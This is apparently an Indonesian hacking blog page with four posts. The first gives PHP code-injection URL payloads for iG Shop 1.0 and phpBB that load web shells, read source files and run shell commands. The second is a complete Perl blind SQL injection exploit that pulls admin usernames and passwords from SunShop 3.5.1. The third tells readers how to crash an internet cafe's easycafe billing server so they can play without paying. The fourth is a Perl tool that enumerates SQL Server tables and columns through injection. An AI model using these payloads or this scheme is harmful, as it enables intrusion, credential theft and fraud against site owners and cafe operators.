PHP injection phpbb dan ig shop

IG shop dan phpbb bukanlah satu vendor yang sama.
IG shop : http://www.igeneric.co.uk/ig-shopping-cart.html
phpbb : http://www.phpbb.com
Namun kesamaan dari 2 php scripts ini adalah opensource.
Kesamaan lainya adalah terdapat 2 celah php injection yang pernah terjadi di versi versi sebelumnya.

Php injection disini bukanlah yang di kenal dengan RFI LFI atau SQL INJECTION.
php injection disini adalah dimana kita dapat menyisipkan perintah perintah php pada url target.

---------------
| iG Shop 1.0 |
---------------


vuln php injection di IG shop terjadi pada page.php dan cart.php dimana perintah eval memangil variabel
yang tak terfilter dengan baik ( http://milw0rm.com/exploits/3083 ).

cart.php pada line 692
eval ("cart_$action();");

page.php pada line 336
eval ("page_$action();");

variabel $action pada ke 2 file tersebut tidak terfilter dengan baik, sehingga memungkinkan kita untuk memangil
variabel tersebut dan menyisipkanya pada url.

Dengan menyisipkan injection ini kita bisa mendapatkan access shell dengan mengunakan r57 atau c99
page.php?action=exit.include($_GET[cok]);exit&cok=[shell]
cart.php?action=exit.include($_GET[cok]);exit&cok=[shell]

Dengan menyisipkan php injection ini kita bisa melihat isi file file penting yang terdapat dalam host
page.php?action=exit.show_source($_GET[cok]);exit&cok=page.php
cart.php?action=exit.show_source($_GET[cok]);exit&cok=page.php

Dengan menyisipkan php injection berikut ini kita bisa menginjeckan perintah shell pada url
page.php?action=exit.passthru($_GET[cok]);exit&cok=uname -a
cart.php?action=exit.passthru($_GET[cok]);exit&cok=id

Kita juga dapat mencoba dengan berbagai macam perintah php seperti fopen readfile dll.


-----------------------------------------
| copyright : (C) 2001 The phpBB Group |
-----------------------------------------

Vuln phpbb terjadi pada file viewtopic.php dimana perintah urlencode memangil variabel highlight yang tak terfilter dengan baik.

explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));
$highlight = urlencode($HTTP_GET_VARS['highlight']);

Dengan munganakan single quote (') yang di convert dalam hex dan character titik (.) kita bisa menyisipkan php injection ke dalam url.

viewtopic.php?p=15&highlight=%2527.show_source($_GET[file]),exit.%2527&file=viewtopic.php
viewtopic.php?p=15&highlight=%2527.include($_GET[file]),exit.%2527&file=[shell]

Read more...

SunShop Version 3.5.1 Blind Sql Injection

#!/usr/bin/perl -w
use LWP::UserAgent;
# scripts : SunShop Version 3.5.1 Remote Blind Sql Injection
# scripts site : http://www.turnkeywebtools.com/sunshop/
# Discovered
# By : irvian
# site : http://irvian.cn
# email : irvian.info@gmail.com

print "\r\n[+]-----------------------------------------[+]\r\n";
print "[+]Blind SQL injection [+]\r\n";
print "[+]SunShop Version 3.5.1 [+]\r\n";
print "[+]code by irvian [+]\r\n";
print "[+]special : ifx, arioo, jipank, bluespy [+]\r\n";
print "[+]-----------------------------------------[+]\n\r";
if (@ARGV < 5){
die "

Cara Mengunakan : perl $0 host option id tabel itemid

Keterangan
host : http://victim.com
Option : pilih 1 untuk mencari username dan pilih 2 untuk mencari password
id : Isi Angka Kolom id biasanya 1, 2 ,3 dst
tabel : Isi Kolom tabel biasanya admin atau ss_admin
itemid : Isi Angka valid (ada productnya) di belakang index.php?action=item&id=
Contoh : perl $0 http://www.underhills.com/cart 1 1 admin 10
\n";}


$url = $ARGV[0];
$option = $ARGV[1];
$id = $ARGV[2];
$tabel = $ARGV[3];
$itemid = $ARGV[4];

if ($option eq 1){
syswrite(STDOUT, "username: ", 10);}
elsif ($option eq 2){
syswrite(STDOUT, "password: ", 10);}

for($i = 1; $i <= 32; $i++){
$f = 0;
$n = 32;
while(!$f && $n <= 57)
{
if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
if ($f==0){
$n = 97;
while(!$f && $n <= 122)
{
if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
}
}
print "\n[+]finish Execution Exploit\n";

sub blind {
my $site = $_[0];
my $op = $_[1];
my $id = $_[2];
my $tbl = $_[3];
my $i = $_[4];
my $n = $_[5];
my $item = $_[6];

if ($op eq 1){
$klm = "username";
}
elsif ($op eq 2){
$klm = "password";
}
my $ua = LWP::UserAgent->new;
my $url = "$site"."/index.php?action=item&id="."$item"."'%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."$tbl"."%20WHERE%20id="."$id"."),"."$i".",1)=CHAR("."$n".")/*";
my $res = $ua->get($url);
my $browser = $res->content;
if ($browser !~ /This product is currently not viewable/i){
return 1;
}
else {
return 0;
}

}

Read more...

Kelemahan Billing easycafe tinasoft

Tips ini sudah di coba dengan baik di billing easycafe version 2.2.14.

Kronologi.
Beberapa orang teman memyarankan saya mengunakan billing easycafe dari tinasoft
yang katanya bagus dan stabli di coba di warnet dia. Dengan rasa penasaran
yang sangat tinggi saya mencoba menginstallnya.
Ternyata dia benar billing easycafe kaya fitur dan sangat komplet.

Masalah.
Karena listrik down dengan sendirinya komputer yang saya install sebagai clien dan
server billing easycafe menjadi mati dan ketika listrik mulai menyala lagi,
saya mencoba menghidupkan komputer server dan clien.
Alangkah terkejutnya saya ketika tidak menemukan data pengunaan clien di dalam log komputer server.

Kesimpulan.
Jika server easycafe mati dan clien juga mati maka data data log pengunaan clien menjadi tidak terdeteksi.

Beware.
Dari kronologi dan kesimpulan diatas kita bisa mencoba bermain gratis di warnet yang mengunakan easycafe sebagi billing.
Masuklah ke warnet dan pakailah komputer seperti biasa, setelah dirasa cukup,
cobalah untuk membuat komputer billing server menjadi crash , hang , reboot atau shutdown.
Cukup bayak cara yang bisa anda gunakan seperti mencoba beberapa exploid & bug windows , DOS atau mungkin dengan teknik social engineering.
Setelah yakin komputer billing server dalam keadaan yang di sebutkan di atas segeralah matikan komputer yang kamu pakai dengan cara menekan tombol on/off dari komputer atau cabut saja kabel listriknya dan tancapkan lagi.
Ketika komputer billing server kembali ke keadaan normal maka log data pengunaan anda menjadi tidak terdeteksi oleh server.

Read more...

cfm scanner tabel dan kolom

#!/usr/bin/perl
use LWP::UserAgent;
# tools untuk artikel Bermain Sql Injection di target cfm
# enjoy :D
# kritik dan saran irvian.info@gmail.com

print "[*]---------------------------------[*]\r\n";
print "[*] DATABASE INJECTOR [*]\r\n";
print "[*] TYPE DATABASE [*]\r\n";
print "[*] SQL SERVER [*]\r\n";
print "[*] created by irvian [*]\r\n";
print "[*]---------------------------------[*]\r\n";

unless ($ARGV[0] and $ARGV[1]){
print "\nuse:$0 \"http://victim.com/query?patch=1\" scan\r\n";
print "change scan with table name for scan column in a table\r\n";
exit;
}

$host = $ARGV[0];
$tbl = $ARGV[1];
if ($host =~ /^https:\/\//i){
$host = "http:\/\/".$';}
if ($host !~ /^http:\/\//i){
$host = "http:\/\/".$ARGV[0];}
if ($host =~ /(.*)\/(.*)\?(.*)=/i){
$host = $&;}
else{
die "Wrong URL, Check Patch Or Query Variabel\n";}
$url = $host."1\'";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$res = $b->request(HTTP::Request->new(GET=>$url));
$browser = $res->content;

print "Detection Database.....\r\n";
sleep (2);

if ($browser =~ /JET Database/i){
die "Program Can't Work On Database Microsoft Jet\n"}

elsif ($browser =~ /Microsoft Access/i){
die "Program Can't Work On Database Microsoft Access\n";}

elsif ($browser =~ /MYSQL/i){
die "Program Can't Work On Database MYSQL\n";}

#SQL SERVER
elsif ($browser =~ /SQL Server|SQLServer/i){
print "Database SQL Server\r\n";
$n=1;
$found="\'\'";
if ($tbl eq "scan") {
print "Scan All Table....\r\n";
while ($url="$host"."convert(int,(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN($found)))--", $res=$b->request(HTTP::Request->new(GET=>$url)), $browser=$res->content, $browser =~ /converting the nvarchar value \'(.+)\'/i)
{
print "Table $n: $1\n";
$weks=$1;
$hiks = &jancok($weks);
$found .= ",$hiks";
$n++;
}
if ($n != 1) {
print "Total Table : ".($n-1)."\n";exit;}
else {
die "Table Not found!\n";
}
}
else {
print "Scan All Column on Table $tbl\r\n";
$duh=&jancok($tbl);
while ($url="$host"."convert(int,(SELECT%20TOP%201%20COLUMN_NAME%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=$duh%20AND%20COLUMN_NAME%20NOT%20IN%20($found)))--", $res=$b->request(HTTP::Request->new(GET=>$url)), $browser=$res->content, $browser =~ /converting the nvarchar value \'(.+)\'/i)
{
print "Column $n: $1\n";
$weks=$1;
$hiks = &jancok($weks);
$found .= ",$hiks";
$n++;
}
if ($n != 1) {
print "Total Column : ".($n-1)."\n";exit;}
else {
die "Column NOT found!\n";
}
}
}

else {
die "Injection Not Work in Victim\n";}

#created by irvian

sub jancok{
$weks=$_[0];
%ascii =
(
" " => "char(32)",
"!" => "char(33)",
"\"" => "char(34)",
"#" => "char(35)",
"\$" => "char(36)",
"%" => "char(37)",
"&" => "char(38)",
"'" => "char(39)",
"(" => "char(40)",
")" => "char(41)",
"*" => "char(42)",
"+" => "char(43)",
"," => "char(44)",
"-" => "char(45)",
"." => "char(46)",
"/" => "char(47)",
"0" => "char(48)",
"1" => "char(49)",
"2" => "char(50)",
"3" => "char(51)",
"4" => "char(52)",
"5" => "char(53)",
"6" => "char(54)",
"7" => "char(55)",
"8" => "char(56)",
"9" => "char(57)",
":" => "char(58)",
";" => "char(59)",
"<" => "char(60)",
"=" => "char(61)",
">" => "char(62)",
"?" => "char(63)",
"@" => "char(64)",
"A" => "char(65)",
"B" => "char(66)",
"C" => "char(67)",
"D" => "char(68)",
"E" => "char(69)",
"F" => "char(70)",
"G" => "char(71)",
"H" => "char(72)",
"I" => "char(73)",
"J" => "char(74)",
"K" => "char(75)",
"L" => "char(76)",
"M" => "char(77)",
"N" => "char(78)",
"O" => "char(79)",
"P" => "char(80)",
"Q" => "char(81)",
"R" => "char(82)",
"S" => "char(83)",
"T" => "char(84)",
"U" => "char(85)",
"V" => "char(86)",
"W" => "char(87)",
"X" => "char(88)",
"Y" => "char(89)",
"Z" => "char(90)",
"[" => "char(91)",
"\\" => "char(92)",
"]" => "char(93)",
"^" => "char(94)",
"_" => "char(95)",
"`" => "char(96)",
"a" => "char(97)",
"b" => "char(98)",
"c" => "char(99)",
"d" => "char(100)",
"e" => "char(101)",
"f" => "char(102)",
"g" => "char(103)",
"h" => "char(104)",
"i" => "char(105)",
"j" => "char(106)",
"k" => "char(107)",
"l" => "char(108)",
"m" => "char(109)",
"n" => "char(110)",
"o" => "char(111)",
"p" => "char(112)",
"q" => "char(113)",
"r" => "char(114)",
"s" => "char(115)",
"t" => "char(116)",
"u" => "char(117)",
"v" => "char(118)",
"w" => "char(119)",
"x" => "char(120)",
"y" => "char(121)",
"z" => "char(122)",
"{" => "char(123)",
"|" => "char(124)",
"}" => "char(125)",
"~" => "char(126)",
"" => "char(127)",
"€" => "char(128)",
"�" => "char(129)",
"‚" => "char(130)",
"ƒ" => "char(131)",
"„" => "char(132)",
"…" => "char(133)",
"†" => "char(134)",
"‡" => "char(135)",
"ˆ" => "char(136)",
"‰" => "char(137)",
"Š" => "char(138)",
"‹" => "char(139)",
"Œ" => "char(140)",
"�" => "char(141)",
"Ž" => "char(142)",
"�" => "char(143)",
"�" => "char(144)",
"‘" => "char(145)",
"’" => "char(146)",
"“" => "char(147)",
"”" => "char(148)",
"•" => "char(149)",
"–" => "char(150)",
"—" => "char(151)",
"˜" => "char(152)",
"™" => "char(153)",
"š" => "char(154)",
"›" => "char(155)",
"œ" => "char(156)",
"�" => "char(157)",
"ž" => "char(158)",
"Ÿ" => "char(159)",
" " => "char(160)",
"¡" => "char(161)",
"¢" => "char(162)",
"£" => "char(163)",
"¤" => "char(164)",
"¥" => "char(165)",
"¦" => "char(166)",
"§" => "char(167)",
"¨" => "char(168)",
"©" => "char(169)",
"ª" => "char(170)",
"«" => "char(171)",
"¬" => "char(172)",
"­" => "char(173)",
"®" => "char(174)",
"¯" => "char(175)",
"°" => "char(176)",
"±" => "char(177)",
"²" => "char(178)",
"³" => "char(179)",
"´" => "char(180)",
"µ" => "char(181)",
"¶" => "char(182)",
"·" => "char(183)",
"¸" => "char(184)",
"¹" => "char(185)",
"º" => "char(186)",
"»" => "char(187)",
"¼" => "char(188)",
"½" => "char(189)",
"¾" => "char(190)",
"¿" => "char(191)",
"À" => "char(192)",
"Á" => "char(193)",
"Â" => "char(194)",
"Ã" => "char(195)",
"Ä" => "char(196)",
"Å" => "char(197)",
"Æ" => "char(198)",
"Ç" => "char(199)",
"È" => "char(200)",
"É" => "char(201)",
"Ê" => "char(202)",
"Ë" => "char(203)",
"Ì" => "char(204)",
"Í" => "char(205)",
"Î" => "char(206)",
"Ï" => "char(207)",
"Ð" => "char(208)",
"Ñ" => "char(209)",
"Ò" => "char(210)",
"Ó" => "char(211)",
"Ô" => "char(212)",
"Õ" => "char(213)",
"Ö" => "char(214)",
"×" => "char(215)",
"Ø" => "char(216)",
"Ù" => "char(217)",
"Ú" => "char(218)",
"Û" => "char(219)",
"Ü" => "char(220)",
"Ý" => "char(221)",
"Þ" => "char(222)",
"ß" => "char(223)",
"à" => "char(224)",
"á" => "char(225)",
"â" => "char(226)",
"ã" => "char(227)",
"ä" => "char(228)",
"å" => "char(229)",
"æ" => "char(230)",
"ç" => "char(231)",
"è" => "char(232)",
"é" => "char(233)",
"ê" => "char(234)",
"ë" => "char(235)",
"ì" => "char(236)",
"í" => "char(237)",
"î" => "char(238)",
"ï" => "char(239)",
"ð" => "char(240)",
"ñ" => "char(241)",
"ò" => "char(242)",
"ó" => "char(243)",
"ô" => "char(244)",
"õ" => "char(245)",
"ö" => "char(246)",
"÷" => "char(247)",
"ø" => "char(248)",
"ù" => "char(249)",
"ú" => "char(250)",
"û" => "char(251)",
"ü" => "char(252)",
"ý" => "char(253)",
"þ" => "char(254)",
"ÿ" => "char(255)"
);
@oh=split(/(?)/, $weks);
$kuda="";
$kacau="";
$i=0;
while ($kluk=@ascii{"$oh[$i]"}){
$i++;
$kacau .= "$kuda"."$kluk";
$kuda = "%2b";
}
return $kacau;
}

#write by irvian

Read more...